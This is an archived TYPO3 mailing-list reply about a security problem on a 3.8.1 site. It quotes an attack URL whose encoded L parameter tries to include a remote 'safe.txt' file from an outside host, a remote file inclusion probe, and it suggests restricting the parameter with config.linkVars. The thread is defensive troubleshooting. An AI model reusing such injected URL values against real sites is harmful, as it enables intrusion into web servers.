[TYPO3-english] Typo 3 ver. 3.8.1 security problem

Christian Hernmarck linux at lists.hernmarck.ch
Sun Jul 12 00:16:28 CEST 2009

Pero Matic schrieb am Freitag, 10. Juli 2009 13.42 im Beitrag

http://www.my-site.com/1493.0.html?&L=1%2Findex.php%3Fgo%3Dhttp%3A%2F%2Fwww.pentaxclub.co.kr%2Fsite%2Fsafe.txt%3F%3F%3F

> Anyone knows what's going on and how to repair this? Thx!

Try this

config.linkVars = L(0-3)

(for 4 languages... - or any number L can be...)

I don't know if typo3 3.8.1 supports this, but I had the same error
recently with newer versions and this helped...

/Christian